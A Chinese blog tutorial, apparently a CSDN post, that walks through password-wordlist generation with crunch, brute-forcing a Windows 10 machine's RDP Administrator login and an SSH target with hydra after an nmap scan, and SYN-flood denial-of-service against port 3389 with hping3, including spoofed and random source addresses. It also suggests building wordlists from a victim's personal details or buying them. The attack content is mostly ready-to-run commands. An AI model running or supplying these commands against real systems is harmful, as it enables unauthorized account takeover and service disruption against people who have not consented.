crunch生成密码字典,hydra暴力破解正常win10用户,hping3进行dos攻击代码抓包演示及命令详解

Crunch

基本命令:
crunch min max [options] data  <min:最小长度,max:最大长度,options:可选项,data:字符集>

生成由1234567890组成的三位密码

crunch 3 3 1234567890 

可选项

-o:将结果输出到指定文件

crunch 3 3 1234567890 -o ./passwd.txt

-t:设置密码模式

crunch 5 5 -t @@^%% \\其中 @@ 代表两个小写字母,^代表特殊字符,%% 代表两个数字

-d [次数+受限制的字符类型]:  生成字符不连续的密码

crunch 3 3 12345 -d 1% -o ./passwd.txt \\生成密码时单个密码同个数字最多连续出现一次<1%:121,2%:112,3%:111>

生成数字不连续的密码

crunch 6 6 -t abc%%% -d 1% -o passwd.txt // 生成的密码中,数字不能连续

生成小写字母和数字都不连续的密码

crunch 6 6 -t a%%@@@ -d 1% -d 1@ -o passwd.txt // 生成的密码中数字不连续,小写字母也不连续

crunch数据类型

<%:数字,@:小写字母,,:大写字母,^:特殊字符>

个人推荐密码字典获取方式

1:使用社工密码生成器根据姓名年龄喜好进行生成

2:直接在购物平台购买常用密码字典

hydra工具详解

基本语法

hydra [选项] [协议://][目标IP|目标域名][:端口] [模块选项]        【标准】

hydra -l 用户名  -P 密码字典 主机地址  协议        【常用】

-l指定用户名-P指定密码字典

hydra -l Administrator -P passwd.txt rdp//:192.168.10.158        \\以192.168.10.158管理员用户的rdp【3389端口】协议进行爆破

hydra -l msfadmin -P passwd.txt  192.168.10.123 ssh        \\对msfadmin靶场的ssh【22端口】远程连接协议进行爆破

常用选项

  • -R : 恢复一个之前的暴力破解任务。
  • -S : 在 SSL 连接中使用定义的协议进行破解。
  • -s PORT : 如果目标服务不运行在默认端口,使用这个选项来定义端口。
  • -l LOGIN : 指定一个登录名进行破解。
  • -L FILE : 指定一个包含多个登录名的文件进行破解。
  • -p PASS : 尝试一个特定的密码进行破解。
  • -P FILE : 指定一个包含多个密码的文件进行破解。
  • -e nsr : 尝试空密码、登录名作为密码或者反向登录名作为密码。
  • -C FILE : 指定一个包含 "login:pass" 格式的文件,用于进行组合破解。
  • -t TASKS : 同时运行的任务数,用于加速破解过程。
  • -w TIME : 设置连接超时时间。
  • -vV : 显示详细过程,大写的 V 会显示更多详细信息。

对正常win10用户进行暴力破解

工具 :社工密码字典生成器,hydra暴力破解,nmap扫描目标主机

环境准备

1:与目标主机在同一个局域网下(连接同一个wifi)

2:能ping通目标主机

3:目标主机信息:博主常用win10系统主机,防火墙等各项功能均为开启状态

4:攻击机:kali2022

开始攻击

ifconfig查看网段信息并使用nmap扫描整个网段获取3384端口开放情况和主机操作系统类型

根据扫描结果可以判断目标主机地址为255.3        rdp(3389端口)服务是开启状态        目标主机大概率是windows且大概率存在管理员Administrator用户

根据扫描结果判断对目标进行暴力破解

拿到爆破结果对目标进行rdp远程连接(由于时间原因密码字典中直接放了准确的密码,实战可根据目标信息进行密码字典生成)

rdesktop 192.168.255.3

// 在kali中远程桌面,输入密码即可连接

hping3工具发起dos攻击代码演示【抓包查看效果】

工具介绍

hping3:可以构造TCP/IP中的数据包,并且可以以泛洪模式发送

syn泛洪攻击rdp服务

┌──(root💀kali)-[~/桌面]

└─# hping3 --syn --flood -p 3389 192.168.10.158

命令详解

hping3 发包类型 发包模式 -p 端口 目标主机地址
发包类型:
--syn:SYN
--udp:UDP
--icmp:ICMP

发包模式:
--flood:泛洪模式

指定端口:

-p

伪造源地址

┌──(root💀kali)-[~/桌面]

└─# hping3 --syn --flood -p 3389 192.168.10.158 -a 1.1.1.1

-a 1.1.1.1

伪造源地址为1.1.1.1

伪造随机源地址

┌──(root💀kali)-[~/桌面]

└─# hping3 --syn --flood -p 3389 192.168.10.158 --rand-source

--rand-source

随机伪造源地址

  • 34
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值